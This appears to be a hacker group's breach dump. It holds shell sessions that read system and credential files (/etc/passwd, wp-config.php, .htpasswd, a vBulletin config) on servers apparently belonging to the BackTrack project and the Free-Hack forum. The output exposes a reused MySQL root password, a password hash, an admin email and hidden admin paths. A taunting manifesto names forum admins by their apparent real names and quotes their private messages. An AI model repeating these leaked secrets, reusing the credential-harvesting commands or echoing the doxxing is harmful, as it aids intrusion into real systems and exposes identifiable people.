ossecm:x:501:500::/var/ossec:/sbin/nologin
ossecr:x:502:500::/var/ossec:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin

$ cd
/var/www/html/

$ ls
total 90224
drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .
drwxr-xr-x. 6 root root 4096 Aug 18 10:30 ..
-rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess
-rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT
-rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG
-rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG
drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads
-rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg
-rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png
-rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png
-rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent
-rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent
-rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt
-rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png
-rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png
-rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html
-rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin
-rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic
-rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin
drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents
-rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php
-rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php
-rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php
-rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php
-rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg
-rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico
drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums
-rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png
-rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html
-rw-r--r--. 1 apache apache 23 Aug 11 03:17 googlehostedservice.html
-rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg
-rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg
-rw-r--r--. 1 apache apache 2197361 Sep 17 08:15 hola2.jpg
-rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png
-rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png
drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images
-rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html
-rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php
-rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png
-rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz
-rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt
-rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
-rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf
-rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar
-rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg
-rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg
drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches
-rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php
-rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html
-rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php
-rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php
-rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php
-rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php
-rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php
-rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml
-rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz
drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider
-rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png
-rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php
-rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt
-rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css
-rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php
drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents
drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki
-rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php
drwxr-xr-x. 8 apache apache 4096 Dec 5 08:12 wp-admin
-rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php
-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php
-rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php
-rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php
-rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php
-rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php
-rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php
drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content
-rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php
-rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php
drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes
-rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php
-rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php
-rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php
-rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php
-rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php
-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php
-rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php
-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php
-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php
-rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php
-rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php
-rw-r--r--. 1 apache apache 3702 Dec 9 12:20 wp-trackback.php
-rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png
-rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif
-rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php

$ cat wp-config.php
<?php
/** Enable W3 Total Cache **/
define('WP_CACHE', true); // Added by W3 Total Cache

/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information by
* visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '234hi2u3d98as7d23kuh');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/

$table_prefix = 'wp_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de.mo to wp-content/languages and set WPLANG to 'de' to enable German
* language support.
*/

define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

/** WordPress absolute path to the Wordpress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

$ cat show.php
<?php
include 'stats.txt';
?>
$ cat stats.txt
BackTrack 4 - 4916323 downloads

cat download.php
<?php

// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!

function getRealIpAddr()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}

$ip=getRealIpAddr();

$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";

function choose($iso)
{

$num = Rand (1,5);
switch ($num)
{
case 1:
$link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
break;

case 2:
$link="http://ftp.uio.no/pub/security/backtrack/$iso";
break;

case 3:
$link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
break;

case 4:
$link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
break;

case 5:
$link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
break;

// case 6:
// $link="http://moon.backtrack-linux.org/downloads/$iso";
// break;


}


return $link;

}


$version=$_GET["fname"];

if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))

{
echo "This page cannot be accessed directly.";
exit;
}

if ($version=="bt4r2")
{

$iso="bt4-r2.iso";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}


if ($version=="bt4r2vm")
{

$iso="bt4-r2-vm.tar.bz2";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}



if ($version=="bt4f")
{

$iso="bt4-final.iso";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}

elseif ($version=="bt4fvm")
{
$iso="bt4-final-vm.zip";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}

elseif ($version=="bt4r1")
{
$iso="bt4-r1.iso";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}

elseif ($version=="bt4r1vm")
{
$iso="bt4-r1-vm.tar.bz2";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}

elseif ($version=="bt4pf")
{
$iso="bt4-pre-final.iso";
$link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

header( "Location: $link ");
exit;
}

elseif ($version=="bt4b")
{
$iso="bt4-beta.iso";
$link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
header( "Location: $link ");
exit;
}

elseif ($version=="bt4bvm")
{
$iso="bt4-beta-vm-6.5.1.rar";
$link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
header( "Location: $link ");
exit;
}

elseif ($version=="bt3")
{
$iso="bt3-final.iso";
$link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
header( "Location: $link ");
exit;
}

else
{
exit;
}

?>


$ cat s.php
<?php


$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";



mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
$query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
$result=mysql_query($query);
$result2=mysql_query($query2);
$row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$numrows1 = $row['numrows'];
$numrows2 = $row2['numrows'];
mysql_close();

$total= round(($numrows1 + $numrows2) * 1.4);

echo "BackTrack 4 Final - $total unique downloads";

?>

$ cd wiki

$ ls

total 700
drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 .
drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 ..
-rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd
-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING
-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS
-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ
-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY
-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT
-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL
-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php
-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README
-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES
-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample
-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE
drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense
-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php
-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin
-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache
drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config
drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs
drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions
drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images
-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php
-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5
drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes
-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php
-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5
drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages
drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math
-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5
-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php
-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php
-rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5
-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml
drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized
-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml
drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins
-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php
-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5
-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php
-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5
-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml

$ cat .htpasswd
edbadmin:YE8mle4nG1Z.c

cd ..
cat forums/includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.0 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/


/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/


// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'forums';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'muts@offsec.com';

// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';

// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincphaha';
$config['Misc']['modcpdir'] = 'modcphaha';

// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1,2';

// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/


// ****** The following options are only needed in special cases ******

// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 22:25, Sat Jan 9th 2010
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/



____________________________________________________|_._._._._._._._,
\___________________________________________________|_|_|_|_|_|_|_|_|
! ~ free-hack ~

Many people will wonder why we owned Free-Hack because they always
claimed to have nothing to do with fraud and stuff. In fact this is
the second time we owned them but the first time we go public. The
first time was a few months ago in order to check out what they were
doing in their internal eleet priv8 sections. To our surprise they
really had nothing to do with fraud. Still, they are part of the
problem we call the skiddy breeding of lameness.

Actually, there are a few communities where you can find a few skilled
members. Free-Hack is a forum where you can find two or three. The
rest are simple skidi0ts who have no right to even exist, let alone be
on our internet. Also the admins, particularly "Suicide" aka Mr.
Stefan Finke or "enco" aka Mr. Enrico Costanzo are nothing but
arrogant asshats who's only apparent talent appears to be banning
people. Oh wait, "Suicide" actually HAS skill. Like he mastered the
usage of Hydra and is now able to hax every Teamspeak server. Ph33r.
Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
guy, who had the right spirit and was willing to learn. But getting
promoted to admin in a "hacker" community with ~40k users which has an
"expert" zone for "skilled" members who talk about how to bypass the
Webspell SQL Injection filter is the worst thing he could have done...

____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| Suicide: |
| Mir fehlt der Stress, das Adrenalin, der Hass den man auf und |
| wegen einigen Usern bekommen hat. In den fünf Jahren gab es so |
| viel Ärger (Fettemama, Hacksector, CIA-World, Grey-Hats, |
| Black-Hats, Mbk, Speedtest). Wieso will sich niemand mehr mit |
| uns anlegen? |
|____________________________________________________________________|

You can have that. There's quite alot of hilarity left in the database
backups we prepared. Do not forget to have a look for yourself. We
especially liked that guy who trolled fred777 by logging into his
account:

____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| PM from fred777 to enco: |
| Hallo, |
| |
| bitte meinen Namen auf "Wurstkoenig" ändern. Vielen Dank |
| |
| fred777 |
|____________________________________________________________________|

That one really worked. GG mate!

____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| Suicide: |
| Warum überhaupt umziehen? Der neue Server hat ungefähr die |
| gleichen Attribute wie der Jetzige. Dazu wird die Firewall um das |
| doppelte verstärkt. Im Gesamtpaket komme ich da besser weg, als in |
| der momentanen Situation. |
|____________________________________________________________________|

Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
Too ninja again.

$ uname -a
Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=508(freehack) gid=504(freehack) groups=504(freehack)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
